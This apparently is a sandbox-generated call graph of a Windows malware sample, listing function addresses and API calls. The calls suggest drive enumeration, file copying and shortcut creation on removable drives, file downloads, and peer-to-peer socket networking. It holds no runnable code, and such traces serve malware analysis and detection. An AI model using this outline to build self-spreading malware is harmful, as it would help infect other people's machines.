5198->5196 5198->5197 5199 405737 5198->5199 5199->5187 5203 40ea16 5200->5203 5201 40e49d 5201->5096 5201->5167 5202 40ea93 lstrcmpiW 5202->5203 5204 40eaab SysFreeString 5202->5204 5203->5201 5203->5202 5203->5204 5204->5203 5207 40ece6 5205->5207 5206 40e88b 5206->5179 5217 40ee20 5206->5217 5207->5206 5208 40ed73 lstrcmpiW 5207->5208 5209 40edf3 SysFreeString 5208->5209 5210 40ed86 5208->5210 5209->5206 5211 40e990 2 API calls 5210->5211 5213 40ed94 5211->5213 5212 40ede5 5212->5209 5213->5209 5213->5212 5214 40edc3 lstrcmpiW 5213->5214 5215 40edd5 5214->5215 5216 40eddb SysFreeString 5214->5216 5215->5216 5216->5212 5218 40e990 2 API calls 5217->5218 5219 40ee3b 5218->5219 5220 40ecc0 6 API calls 5219->5220 5221 40e8a9 5219->5221 5220->5221 5221->5172 5221->5179 5223 40e990 2 API calls 5222->5223 5225 40eafb 5223->5225 5224 40e8e5 5224->5176 5224->5177 5225->5224 5231 40eb60 5225->5231 5228 40e9b6 5227->5228 5229 40e9cd 5228->5229 5230 40e9f0 2 API calls 5228->5230 5229->5179 5230->5229 5232 40eb86 5231->5232 5233 40ec9d 5232->5233 5234 40ec13 lstrcmpiW 5232->5234 5233->5224 5235 40ec93 SysFreeString 5234->5235 5236 40ec26 5234->5236 5235->5233 5237 40e990 2 API calls 5236->5237 5239 40ec34 5237->5239 5238 40ec85 5238->5235 5239->5235 5239->5238 5240 40ec63 lstrcmpiW 5239->5240 5241 40ec75 5240->5241 5242 40ec7b SysFreeString 5240->5242 5241->5242 5242->5238 5244 40d3ed 5243->5244 5245 40d408 SysFreeString 5244->5245 5246 40a990 9 API calls 5244->5246 5247 40d390 _vscprintf wvsprintfA 5244->5247 5245->5099 5246->5244 5247->5244 5249 40b41c socket 5248->5249 5250 40b409 gethostbyname 5248->5250 5249->5105 5249->5109 5250->5249 5251->5109 5252->5112 5254 40ef47 5253->5254 5255 40f014 InternetConnectA 5253->5255 5254->5117 5254->5119 5256 40f194 InternetCloseHandle 5255->5256 5257 40f04d HttpOpenRequestA 5255->5257 5256->5254 5258 40f083 HttpAddRequestHeadersA HttpSendRequestA 5257->5258 5259 40f187 InternetCloseHandle 5257->5259 5260 40f17a InternetCloseHandle 5258->5260 5261 40f0cd 5258->5261 5259->5256 5260->5259 5262 40f0e4 InternetReadFile 5261->5262 5263 40f111 5261->5263 5264 40a990 9 API calls 5261->5264 5262->5261 5262->5263 5263->5260 5265 40f12c memcpy 5264->5265 5265->5261 5271 407417 5266->5271 5267 4075eb 5268 4075f4 SysFreeString 5267->5268 5270 4073bb SysFreeString 5267->5270 5268->5270 5269 40ab60 _invalid_parameter 3 API calls 5269->5267 5270->4569 5272 407670 CoCreateInstance 5271->5272 5273 407566 SysAllocString 5271->5273 5274 407432 5271->5274 5272->5271 5273->5271 5273->5274 5274->5267 5274->5269 5276 40c87a 5275->5276 5277 40c87e 5275->5277 5276->4575 5279 40c830 CryptAcquireContextW 5277->5279 5280 40c86b 5279->5280 5281 40c84d CryptGenRandom CryptReleaseContext 5279->5281 5280->5276 5281->5280 5282->4591 5334 40b780 gethostname 5283->5334 5286 40b869 5286->4591 5288 40b87c strcmp 5288->5286 5289 40b891 5288->5289 5338 40b3d0 inet_ntoa 5289->5338 5291 40b89f strstr 5292 40b8f0 5291->5292 5293 40b8af 5291->5293 5341 40b3d0 inet_ntoa 5292->5341 5339 40b3d0 inet_ntoa 5293->5339 5296 40b8bd strstr 5296->5286 5298 40b8cd 5296->5298 5297 40b8fe strstr 5299 40b90e 5297->5299 5300 40b94f 5297->5300 5340 40b3d0 inet_ntoa 5298->5340 5342 40b3d0 inet_ntoa 5299->5342 5344 40b3d0 inet_ntoa 5300->5344 5304 40b95d strstr 5307 40b96d 5304->5307 5308 40b9ae EnterCriticalSection 5304->5308 5305 40b8db strstr 5305->5286 5305->5292 5306 40b91c strstr 5306->5286 5309 40b92c 5306->5309 5345 40b3d0 inet_ntoa 5307->5345 5311 40b9c6 5308->5311 5343 40b3d0 inet_ntoa 5309->5343 5319 40b9f1 5311->5319 5347 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5311->5347 5313 40b97b strstr 5313->5286 5315 40b98b 5313->5315 5314 40b93a strstr 5314->5286 5314->5300 5346 40b3d0 inet_ntoa 5315->5346 5318 40baea LeaveCriticalSection 5318->5286 5319->5318 5321 40a740 7 API calls 5319->5321 5320 40b999 strstr 5320->5286 5320->5308 5322 40ba35 5321->5322 5322->5318 5348 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5322->5348 5324 40ba53 5325 40ba80 5324->5325 5326 40ba76 Sleep 5324->5326 5328 40baa5 5324->5328 5327 40ab60 _invalid_parameter 3 API calls 5325->5327 5326->5324 5327->5328 5328->5318 5349 40b530 5328->5349 5330->4603 5332 40b530 14 API calls 5331->5332 5333 40b523 LeaveCriticalSection 5332->5333 5333->4598 5335 40b7c3 5334->5335 5336 40b7a7 gethostbyname 5334->5336 5335->5286 5337 40b3d0 inet_ntoa 5335->5337 5336->5335 5337->5288 5338->5291 5339->5296 5340->5305 5341->5297 5342->5306 5343->5314 5344->5304 5345->5313 5346->5320 5347->5319 5348->5324 5350 40b544 5349->5350 5357 40b53f 5349->5357 5351 40a950 _invalid_parameter 7 API calls 5350->5351 5352 40b558 5351->5352 5353 40b5b4 CreateFileW 5352->5353 5352->5357 5354 40b603 InterlockedExchange 5353->5354 5355 40b5d7 WriteFile FlushFileBuffers CloseHandle 5353->5355 5356 40ab60 _invalid_parameter 3 API calls 5354->5356 5355->5354 5356->5357 5357->5318 5361 40dcdd 5358->5361 5359 40dc13 5359->4610 5359->4611 5360 40dd01 WaitForSingleObject 5360->5361 5362 40dd1c CloseHandle 5360->5362 5361->5359 5361->5360 5362->5361 5366 407840 5363->5366 5364 407868 Sleep 5364->5366 5365 40791a Sleep 5365->5366 5366->5364 5366->5365 5367 407897 Sleep wsprintfA DeleteUrlCacheEntry 5366->5367 5369 40f560 63 API calls 5366->5369 5393 40f4b0 InternetOpenA 5367->5393 5369->5366 5371 4058c9 memset GetModuleHandleW 5370->5371 5372 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5371->5372 5372->5372 5373 405940 CreateWindowExW 5372->5373 5374 40596b 5373->5374 5375 40596d GetMessageA 5373->5375 5376 40599f ExitThread 5374->5376 5377 405981 TranslateMessage DispatchMessageA 5375->5377 5378 405997 5375->5378 5377->5375 5378->5371 5378->5376 5400 40f1f0 CreateFileW 5379->5400 5381 4070f8 ExitThread 5383 406fa0 5383->5381 5384 4070e8 Sleep 5383->5384 5385 406fd9 5383->5385 5403 4063e0 GetLogicalDrives 5383->5403 5384->5383 5409 406300 5385->5409 5388 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5389 407086 wsprintfW 5388->5389 5390 40709b wsprintfW 5388->5390 5389->5390 5415 4068e0 _chkstk 5390->5415 5392 40700b 5394 40f4d6 InternetOpenUrlA 5393->5394 5395 40f548 Sleep 5393->5395 5396 40f4f5 HttpQueryInfoA 5394->5396 5397 40f53e InternetCloseHandle 5394->5397 5395->5366 5398 40f534 InternetCloseHandle 5396->5398 5399 40f51e 5396->5399 5397->5395 5398->5397 5399->5398 5401 40f238 5400->5401 5402 40f21f GetFileSize CloseHandle 5400->5402 5401->5383 5402->5401 5408 40640d 5403->5408 5404 406486 5404->5383 5405 40641c RegOpenKeyExW 5406 40643e RegQueryValueExW 5405->5406 5405->5408 5407 40647a RegCloseKey 5406->5407 5406->5408 5407->5408 5408->5404 5408->5405 5408->5407 5410 406359 5409->5410 5411 40631c 5409->5411 5410->5388 5410->5392 5474 406360 GetDriveTypeW 5411->5474 5414 40634b lstrcpyW 5414->5410 5416 4068fe 7 API calls 5415->5416 5447 4068f7 5415->5447 5417 4069d2 5416->5417 5418 406a14 PathFileExistsW 5416->5418 5419 40f1f0 3 API calls 5417->5419 5420 406ac4 5418->5420 5421 406a29 PathFileExistsW 5418->5421 5423 4069de 5419->5423 5422 406af5 PathFileExistsW 5420->5422 5479 4064a0 7 API calls 5420->5479 5424 406a59 PathFileExistsW 5421->5424 5425 406a3a SetFileAttributesW DeleteFileW 5421->5425 5430 406b06 5422->5430 5431 406b47 PathFileExistsW 5422->5431 5423->5418 5429 4069f5 SetFileAttributesW DeleteFileW 5423->5429 5426 406a6a CreateDirectoryW 5424->5426 5427 406a8c PathFileExistsW 5424->5427 5425->5424 5426->5427 5432 406a7d SetFileAttributesW 5426->5432 5427->5420 5435 406a9d CopyFileW 5427->5435 5429->5418 5436 40f1f0 3 API calls 5430->5436 5433 406b58 5431->5433 5434 406bca PathFileExistsW 5431->5434 5432->5427 5433->5434 5438 406b64 PathFileExistsW 5433->5438 5440 406c75 FindFirstFileW 5434->5440 5441 406bdf PathFileExistsW 5434->5441 5435->5420 5439 406ab5 SetFileAttributesW 5435->5439 5437 406b12 5436->5437 5437->5431 5443 406b28 SetFileAttributesW DeleteFileW 5437->5443 5438->5434 5444 406b73 CopyFileW 5438->5444 5439->5420 5440->5447 5471 406c9c 5440->5471 5445 406bf0 5441->5445 5446 406c2c 5441->5446 5442 406ad4 5442->5422 5448 40f1f0 3 API calls 5442->5448 5443->5431 5444->5434 5451 406b8b SetFileAttributesW PathFileExistsW 5444->5451 5452 406c12 5445->5452 5453 406bf8 5445->5453 5449 406c34 5446->5449 5450 406c4e 5446->5450 5447->5392 5455 406aed 5448->5455 5456 406660 4 API calls 5449->5456 5457 406660 4 API calls 5450->5457 5451->5434 5458 406bab SetFileAttributesW DeleteFileW 5451->5458 5461 406660 4 API calls 5452->5461 5489 406660 CoInitialize CoCreateInstance 5453->5489 5454 406d5e lstrcmpW 5460 406d74 lstrcmpW 5454->5460 5454->5471 5455->5422 5462 406c0d SetFileAttributesW 5456->5462 5457->5462 5458->5434 5460->5471 5461->5462 5462->5440 5463 406f35 FindNextFileW 5463->5454 5465 406f51 FindClose 5463->5465 5465->5447 5466 406dba lstrcmpiW 5466->5471 5467 406e21 PathMatchSpecW 5468 406e42 wsprintfW SetFileAttributesW DeleteFileW 5467->5468 5467->5471 5468->5471 5469 406e9f PathFileExistsW 5470 406eb5 wsprintfW wsprintfW 5469->5470 5469->5471 5470->5471 5472 406f1f MoveFileExW 5470->5472 5471->5454 5471->5463 5471->5466 5471->5467 5471->5469 5494 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5471->5494 5472->5463 5475 406388 5474->5475 5478 40633f 5474->5478 5476 40639c QueryDosDeviceW 5475->5476 5475->5478 5477 4063b6 StrCmpNW 5476->5477 5476->5478 5477->5478 5478->5410 5478->5414 5480 406640 InternetCloseHandle 5479->5480 5481 40653e InternetOpenUrlW 5479->5481 5480->5442 5482 406633 InternetCloseHandle 5481->5482 5483 40656b CreateFileW 5481->5483 5482->5480 5484 406626 CloseHandle 5483->5484 5485 406598 InternetReadFile 5483->5485 5484->5482 5486 4065eb CloseHandle wsprintfW DeleteFileW 5485->5486 5487 4065bc 5485->5487 5486->5484 5487->5486 5488 4065c5 WriteFile 5487->5488 5488->5485 5490 406696 5489->5490 5493 4066ee 5489->5493 5491 4066a9 wsprintfW 5490->5491 5492 4066cf wsprintfW 5490->5492 5490->5493 5491->5493 5492->5493 5493->5462 5495 4067f5 lstrcmpW 5494->5495 5496 4068cf 5494->5496 5497 40680b lstrcmpW 5495->5497 5501 406821 5495->5501 5496->5471 5498 406823 wsprintfW wsprintfW 5497->5498 5497->5501 5500 406886 MoveFileExW 5498->5500 5498->5501 5499 40689c FindNextFileW 5499->5495 5502 4068b8 FindClose RemoveDirectoryW 5499->5502 5500->5499 5501->5499 5502->5496 5870 40d980 5876 4021b0 5870->5876 5873 40d9bf 5874 40d9a5 WaitForSingleObject 5880 401600 5874->5880 5877 4021bb 5876->5877 5878 4021cf 5876->5878 5877->5878 5901 402020 5877->5901 5878->5873 5878->5874 5881 401737 5880->5881 5882 40160d 5880->5882 5881->5873 5882->5881 5883 401619 EnterCriticalSection 5882->5883 5884 401630 5883->5884 5885 4016b5 LeaveCriticalSection SetEvent 5883->5885 5884->5885 5890 401641 InterlockedDecrement 5884->5890 5892 40165a InterlockedExchangeAdd 5884->5892 5899 4016a0 InterlockedDecrement 5884->5899 5886 4016d0 5885->5886 5887 4016e8 5885->5887 5888 4016d6 PostQueuedCompletionStatus 5886->5888 5889 40dd50 11 API calls 5887->5889 5888->5887 5888->5888 5891 4016f3 5889->5891 5890->5884 5893 40de90 7 API calls 5891->5893 5892->5884 5894 40166d InterlockedIncrement 5892->5894 5895 4016fc CloseHandle CloseHandle WSACloseEvent 5893->5895 5896 401c50 4 API calls 5894->5896 5922 40b4f0 shutdown closesocket 5895->5922 5896->5884 5898 401724 DeleteCriticalSection 5900 40ab60 _invalid_parameter 3 API calls 5898->5900 5899->5884 5900->5881 5902 40a740 7 API calls 5901->5902 5903 40202b 5902->5903 5904 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5903->5904 5910 4021a5 5903->5910 5905 402076 CreateIoCompletionPort 5904->5905 5906 40219f 5904->5906 5905->5906 5907 40208f 5905->5907 5908 401600 36 API calls 5906->5908 5909 40dbb0 8 API calls 5907->5909 5908->5910 5911 402094 5909->5911 5910->5878 5911->5906 5912 40209f WSASocketA 5911->5912 5912->5906 5913 4020bd setsockopt htons bind 5912->5913 5913->5906 5914 402126 listen 5913->5914 5914->5906 5915 40213a WSACreateEvent 5914->5915 5915->5906 5916 402147 WSAEventSelect 5915->5916 5916->5906 5917 402159 5916->5917 5918 40217f 5917->5918 5919 40dbe0 17 API calls 5917->5919 5920 40dbe0 17 API calls 5918->5920 5919->5917 5921 402194 5920->5921 5921->5878 5922->5898 5935 406085 5937 405ffe 5935->5937 5936 40608a LeaveCriticalSection 5937->5936 5938 40abd0 8 API calls 5937->5938 5939 40605c 5938->5939 5939->5936 5503 406fc6 5507 406fa8 5503->5507 5504 4070e8 Sleep 5504->5507 5505 406fd9 5506 406300 4 API calls 5505->5506 5509 406fea 5506->5509 5507->5504 5507->5505 5508 4070f8 ExitThread 5507->5508 5510 4063e0 4 API calls 5507->5510 5511 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5509->5511 5515 40700b 5509->5515 5510->5507 5512 407086 wsprintfW 5511->5512 5513 40709b wsprintfW 5511->5513 5512->5513 5514 4068e0 82 API calls 5513->5514 5514->5515 5940 40f908 5941 40f910 5940->5941 5942 40f9c4 5941->5942 5946 40fb45 5941->5946 5945 40f949 5945->5942 5950 40fa30 RtlUnwind 5945->5950 5947 40fb5a 5946->5947 5949 40fb76 5946->5949 5948 40fbe5 NtQueryVirtualMemory 5947->5948 5947->5949 5948->5949 5949->5945 5951 40fa48 5950->5951 5951->5945 5516 40df50 5519 40bf20 5516->5519 5532 40bf31 5519->5532 5522 40ab60 _invalid_parameter 3 API calls 5523 40c2ff 5522->5523 5524 40c310 21 API calls 5524->5532 5526 40bf4f 5526->5522 5528 40bed0 13 API calls 5528->5532 5529 40b830 32 API calls 5529->5532 5532->5524 5532->5526 5532->5528 5532->5529 5533 40c460 5532->5533 5540 40bc00 EnterCriticalSection 5532->5540 5545 407240 5532->5545 5550 4072e0 5532->5550 5555 407110 5532->5555 5562 407210 5532->5562 5534 40c471 lstrlenA 5533->5534 5535 40cb40 7 API calls 5534->5535 5536 40c48f 5535->5536 5536->5534 5538 40c49b 5536->5538 5537 40ab60 _invalid_parameter 3 API calls 5539 40c51f 5537->5539 5538->5537 5538->5539 5539->5532 5542 40bc18 5540->5542 5541 40bc54 LeaveCriticalSection 5541->5532 5542->5541 5565 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5542->5565 5544 40bc43 5544->5541 5566 407280 5545->5566 5548 407279 5548->5532 5549 40dbe0 17 API calls 5549->5548 5551 407280 75 API calls 5550->5551 5552 4072ff 5551->5552 5553 40732c 5552->5553 5581 407340 5552->5581 5553->5532 5592 405fe0 EnterCriticalSection 5555->5592 5557 40712a 5558 40715d 5557->5558 5597 407170 5557->5597 5558->5532 5561 40ab60 _invalid_parameter 3 API calls 5561->5558 5604 4060a0 EnterCriticalSection 5562->5604 5564 407232 5564->5532 5565->5544 5569 407293 5566->5569 5567 407254 5567->5548 5567->5549 5569->5567 5570 405ef0 EnterCriticalSection 5569->5570 5571 40d1d0 71 API calls 5570->5571 5572 405f0e 5571->5572 5573 405fcb LeaveCriticalSection 5572->5573 5574 405f27 5572->5574 5579 405f48 5572->5579 5573->5569 5575 405f31 memcpy 5574->5575 5576 405f46 5574->5576 5575->5576 5577 40ab60 _invalid_parameter 3 API calls 5576->5577 5578 405fc8 5577->5578 5578->5573 5579->5576 5580 405fa6 memcpy 5579->5580 5580->5576 5584 40be30 5581->5584 5585 40c8b0 3 API calls 5584->5585 5586 40be3b 5585->5586 5587 40be57 lstrlenA 5586->5587 5588 40cb40 7 API calls 5587->5588 5589 40be8d 5588->5589 5590 407385 5589->5590 5591 40ab60 _invalid_parameter 3 API calls 5589->5591 5590->5553 5591->5590 5593 405ffe 5592->5593 5594 40608a LeaveCriticalSection 5593->5594 5595 40abd0 8 API calls 5593->5595 5594->5557 5596 40605c 5595->5596 5596->5594 5598 40a950 _invalid_parameter 7 API calls 5597->5598 5599 407182 memcpy 5598->5599 5600 40be30 13 API calls 5599->5600 5601 4071ec 5600->5601 5602 40ab60 _invalid_parameter 3 API calls 5601->5602 5603 407151 5602->5603 5603->5561 5629 40d230 5604->5629 5607 4062e3 LeaveCriticalSection 5607->5564 5608 40d1d0 71 API calls 5609 4060d9 5608->5609 5609->5607 5610 406134 memcpy 5609->5610 5612 4061f8 5609->5612 5613 40ab60 _invalid_parameter 3 API calls 5610->5613 5611 406221 5614 40ab60 _invalid_parameter 3 API calls 5611->5614 5612->5611 5615 405d30 76 API calls 5612->5615 5616 406158 5613->5616 5617 406242 5614->5617 5615->5611 5618 40abd0 8 API calls 5616->5618 5617->5607 5619 406251 CreateFileW 5617->5619 5620 406168 5618->5620 5619->5607 5621 406274 5619->5621 5622 40ab60 _invalid_parameter 3 API calls 5620->5622 5624 406291 WriteFile 5621->5624 5625 4062cf FlushFileBuffers CloseHandle 5621->5625 5623 40618f 5622->5623 5626 40cb40 7 API calls 5623->5626 5624->5621 5625->5607 5627 4061c5 5626->5627 5628 4076c0 72 API calls 5627->5628 5628->5612 5632 40c780 5629->5632 5634 40c791 5632->5634 5633 40abd0 8 API calls 5633->5634 5634->5633 5635 40c6e0 70 API calls 5634->5635 5637 40c7ab 5634->5637 5639 4084a0 68 API calls 5634->5639 5640 40c7eb memcmp 5634->5640 5635->5634 5636 40ab60 _invalid_parameter 3 API calls 5638 4060c2 5636->5638 5637->5636 5638->5607 5638->5608 5639->5634 5640->5634 5640->5637 5641 401f50 GetQueuedCompletionStatus 5642 401f92 5641->5642 5647 402008 5641->5647 5643 401f97 WSAGetOverlappedResult 5642->5643 5648 401d60 5642->5648 5643->5642 5644 401fb9 WSAGetLastError 5643->5644 5644->5642 5646 401fd3 GetQueuedCompletionStatus 5646->5642 5646->5647 5649 401ef2 InterlockedDecrement setsockopt closesocket 5648->5649 5650 401d74 5648->5650 5651 401e39 5649->5651 5650->5649 5652 401d7c 5650->5652 5651->5646 5668 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5652->5668 5654 401d81 InterlockedExchange 5655 401d98 5654->5655 5656 401e4e 5654->5656 5655->5651 5659 401da9 InterlockedDecrement 5655->5659 5660 401dbc InterlockedDecrement InterlockedExchangeAdd 5655->5660 5657 401e67 5656->5657 5658 401e57 InterlockedDecrement 5656->5658 5661 401e72 5657->5661 5662 401e87 InterlockedDecrement 5657->5662 5658->5646 5659->5646 5664 401e2f 5660->5664 5677 401ae0 WSASend 5661->5677 5663 401ee9 5662->5663 5663->5646 5669 401cf0 5664->5669 5666 401e7e 5666->5646 5668->5654 5670 401d00 InterlockedExchangeAdd 5669->5670 5671 401cfc 5669->5671 5672 401d53 5670->5672 5673 401d17 InterlockedIncrement 5670->5673 5671->5651 5672->5651 5683 401c50 WSARecv 5673->5683 5675 401d46 5675->5672 5676 401d4c InterlockedDecrement 5675->5676 5676->5672 5678 401b50 5677->5678 5679 401b12 WSAGetLastError 5677->5679 5678->5666 5679->5678 5680 401b1f 5679->5680 5681 401b56 5680->5681 5682 401b26 Sleep WSASend 5680->5682 5681->5666 5682->5678 5682->5679 5684 401cd2 5683->5684 5685 401c8e 5683->5685 5684->5675 5686 401c90 WSAGetLastError 5685->5686 5687 401ca4 Sleep WSARecv 5685->5687 5688 401cdb 5685->5688 5686->5684 5686->5685 5687->5684 5687->5686 5688->5675 5689 40db50 5694 401b60 5689->5694 5691 40db65 5692 40db84 5691->5692 5693 401b60 16 API calls 5691->5693 5693->5692 5695 401b70 5694->5695 5713 401c42 5694->5713 5696 40a740 7 API calls 5695->5696 5695->5713 5697 401b9d 5696->5697 5698 40abd0 8 API calls 5697->5698 5697->5713 5699 401bc9 5698->5699 5700 401be6 5699->5700 5701 401bd6 5699->5701 5702 401ae0 4 API calls 5700->5702 5703 40ab60 _invalid_parameter 3 API calls 5701->5703 5704 401bf3 5702->5704 5705 401bdc 5703->5705 5706 401c33 5704->5706 5707 401bfc EnterCriticalSection 5704->5707 5705->5691 5710 40ab60 _invalid_parameter 3 API calls 5706->5710 5708 401c13 5707->5708 5709 401c1f LeaveCriticalSection 5707->5709 5708->5709 5709->5691 5711 401c3c 5710->5711 5712 40ab60 _invalid_parameter 3 API calls 5711->5712 5712->5713 5713->5691 5714 40bdd0 5715 40bdd3 WaitForSingleObject 5714->5715 5716 40be01 5715->5716 5717 40bdeb InterlockedDecrement 5715->5717 5718 40bdfa 5717->5718 5718->5715 5719 40b510 16 API calls 5718->5719 5719->5718 5720 40dfd0 5730 4013b0 5720->5730 5723 40dff7 InterlockedExchangeAdd 5724 40e03b WaitForSingleObject 5723->5724 5725 40dfdd 5723->5725 5724->5725 5726 40e054 5724->5726 5725->5723 5725->5724 5729 40e05d 5725->5729 5742 40bbb0 EnterCriticalSection 5725->5742 5747 40bed0 5725->5747 5750 401330 5726->5750 5731 40a740 7 API calls 5730->5731 5732 4013bb CreateEventA socket 5731->5732 5733 4013f2 5732->5733 5734 4013f8 5732->5734 5735 401330 8 API calls 5733->5735 5736 401401 bind 5734->5736 5737 401462 5734->5737 5735->5734 5738 401444 CreateThread 5736->5738 5739 401434 5736->5739 5737->5725 5738->5737 5740 401330 8 API calls 5739->5740 5741 40143a 5740->5741 5741->5725 5743 40bbe7 LeaveCriticalSection 5742->5743 5744 40bbcf 5742->5744 5743->5725 5745 40c870 3 API calls 5744->5745 5746 40bbda 5745->5746 5746->5743 5748 40be30 13 API calls 5747->5748 5749 40bf11 5748->5749 5749->5725 5751 401339 5750->5751 5758 40139b 5750->5758 5752 401341 SetEvent WaitForSingleObject CloseHandle 5751->5752 5751->5758 5754 401369 5752->5754 5759 40138b 5752->5759 5755 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5754->5755 5754->5759 5755->5754 5756 401395 5757 40ab60 _invalid_parameter 3 API calls 5756->5757 5757->5758 5758->5729 5760 40b4f0 shutdown closesocket 5759->5760 5760->5756 5761 40d9d0 5762 40d9e6 5761->5762 5766 40da3e 5761->5766 5763 40d9f0 5762->5763 5764 40da43 5762->5764 5765 40da93 5762->5765 5762->5766 5767 40a740 7 API calls 5763->5767 5769 40da68 5764->5769 5770 40da5b InterlockedDecrement 5764->5770 5795 40c570 5765->5795 5771 40d9fd 5767->5771 5772 40ab60 _invalid_parameter 3 API calls 5769->5772 5770->5769 5784 4023d0 5771->5784 5774 40da74 5772->5774 5775 40ab60 _invalid_parameter 3 API calls 5774->5775 5775->5766 5779 40da2b InterlockedIncrement 5779->5766 5781 40daf1 IsBadReadPtr 5782 40dab9 5781->5782 5782->5766 5782->5781 5783 40bf20 195 API calls 5782->5783 5800 40c670 5782->5800 5783->5782 5785 402413 5784->5785 5786 4023d9 5784->5786 5788 40b6f0 5785->5788 5786->5785 5787 4023ea InterlockedIncrement 5786->5787 5787->5785 5789 40b780 2 API calls 5788->5789 5790 40b6ff 5789->5790 5791 40b70d EnterCriticalSection 5790->5791 5792 40b709 5790->5792 5793 40b72c LeaveCriticalSection 5791->5793 5792->5766 5792->5779 5793->5792 5796 40c583 5795->5796 5797 40c5ad memcpy 5795->5797 5798 40a990 9 API calls 5796->5798 5797->5782 5799 40c5a4 5798->5799 5799->5797 5801 40c699 5800->5801 5802 40c68e 5800->5802 5801->5802 5803 40c6b1 memmove 5801->5803 5802->5782 5803->5802 5966 40f910 5967 40f92e 5966->5967 5969 40f9c4 5966->5969 5968 40fb45 NtQueryVirtualMemory 5967->5968 5971 40f949 5968->5971 5970 40fa30 RtlUnwind 5970->5971 5971->5969 5971->5970 5972 40d510 5973 40b6f0 4 API calls 5972->5973 5974 40d523 5973->5974 5975 40d53a 5974->5975 5977 40d550 InterlockedExchangeAdd 5974->5977 5978 40d56d 5977->5978 5988 40d566 5977->5988 5994 40d840 5978->5994 5981 40d58d InterlockedIncrement 5991 40d597 5981->5991 5982 40bed0 13 API calls 5982->5991 5983 40d5c0 6001 40b3d0 inet_ntoa 5983->6001 5985 40d5cc 5986 40d690 InterlockedDecrement 5985->5986 6002 40b4f0 shutdown closesocket 5986->6002 5988->5975 5989 40a950 _invalid_parameter 7 API calls 5989->5991 5990 40d770 6 API calls 5990->5991 5991->5982 5991->5983 5991->5986 5991->5989 5991->5990 5992 40bf20 195 API calls 5991->5992 5993 40ab60 _invalid_parameter 3 API calls 5991->5993 5992->5991 5993->5991 5995 40d84d socket 5994->5995 5996 40d862 htons connect 5995->5996 5997 40d8bf 5995->5997 5996->5997 5999 40d8aa 5996->5999 5997->5995 5998 40d57d 5997->5998 5998->5981 5998->5988 6003 40b4f0 shutdown closesocket 5999->6003 6001->5985 6002->5988 6003->5998 6004 401920 GetTickCount WaitForSingleObject 6005 401ac9 6004->6005 6006 40194d WSAWaitForMultipleEvents 6004->6006 6007 4019f0 GetTickCount 6006->6007 6008 40196a WSAEnumNetworkEvents 6006->6008 6009 401a43 GetTickCount 6007->6009 6010 401a05 EnterCriticalSection 6007->6010 6008->6007 6024 401983 6008->6024 6013 401ab5 WaitForSingleObject 6009->6013 6014 401a4e EnterCriticalSection 6009->6014 6011 401a16 6010->6011 6012 401a3a LeaveCriticalSection 6010->6012 6018 401a29 LeaveCriticalSection 6011->6018 6046 401820 6011->6046 6012->6013 6013->6005 6013->6006 6016 401aa1 LeaveCriticalSection GetTickCount 6014->6016 6017 401a5f InterlockedExchangeAdd 6014->6017 6015 401992 accept 6015->6007 6015->6024 6016->6013 6064 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6017->6064 6018->6013 6022 401a72 6022->6016 6022->6017 6065 40b4f0 shutdown closesocket 6022->6065 6024->6007 6024->6015 6025 401cf0 7 API calls 6024->6025 6026 4022c0 6024->6026 6025->6007 6027 4022d2 EnterCriticalSection 6026->6027 6028 4022cd 6026->6028 6029 4022e7 6027->6029 6030 4022fd LeaveCriticalSection 6027->6030 6028->6024 6029->6030 6031 402308 6030->6031 6032 40230f 6030->6032 6031->6024 6033 40a740 7 API calls 6032->6033 6034 402319 6033->6034 6035 402326 getpeername CreateIoCompletionPort 6034->6035 6036 4023b8 6034->6036 6038 4023b2 6035->6038 6039 402366 6035->6039 6068 40b4f0 shutdown closesocket 6036->6068 6040 40ab60 _invalid_parameter 3 API calls 6038->6040 6066 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6039->6066 6040->6036 6041 4023c3 6041->6024 6043 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6067 4021e0 EnterCriticalSection LeaveCriticalSection 6043->6067 6045 4023ab 6045->6024 6047 40190f 6046->6047 6048 401830 6046->6048 6047->6012 6048->6047 6049 40183d InterlockedExchangeAdd 6048->6049 6049->6047 6055 401854 6049->6055 6050 401880 6051 401891 6050->6051 6078 40b4f0 shutdown closesocket 6050->6078 6054 4018a7 InterlockedDecrement 6051->6054 6056 401901 6051->6056 6054->6056 6055->6047 6055->6050 6069 4017a0 EnterCriticalSection 6055->6069 6057 402247 6056->6057 6058 402265 EnterCriticalSection 6056->6058 6057->6012 6059 40229c LeaveCriticalSection DeleteCriticalSection 6058->6059 6062 40227d 6058->6062 6060 40ab60 _invalid_parameter 3 API calls 6059->6060 6060->6057 6061 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6061->6062 6062->6061 6063 40229b 6062->6063 6063->6059 6064->6022 6065->6022 6066->6043 6067->6045 6068->6041 6070 401807 LeaveCriticalSection 6069->6070 6071 4017ba InterlockedExchangeAdd 6069->6071 6070->6055 6072 4017ca LeaveCriticalSection 6071->6072 6073 4017d9 6071->6073 6072->6055 6074 40ab60 _invalid_parameter 3 API calls 6073->6074 6075 4017fe 6074->6075 6076 40ab60 _invalid_parameter 3 API calls 6075->6076 6077 401804 6076->6077 6077->6070 6078->6051 6079 40dfa0 6082 401200 6079->6082 6081 40dfc2 6083 40121d 6082->6083 6096 401314 6082->6096 6084 40a950 _invalid_parameter 7 API calls 6083->6084 6083->6096 6085 401247 memcpy htons 6084->6085 6086 4012ed 6085->6086 6087 401297 sendto 6085->6087 6090 40ab60 _invalid_parameter 3 API calls 6086->6090 6088 4012b6 InterlockedExchangeAdd 6087->6088 6089 4012e9 6087->6089 6088->6087 6091 4012cc 6088->6091 6089->6086 6092 40130a 6089->6092 6093 4012fc 6090->6093 6095 40ab60 _invalid_parameter 3 API calls 6091->6095 6094 40ab60 _invalid_parameter 3 API calls 6092->6094 6093->6081 6094->6096 6097 4012db 6095->6097 6096->6081 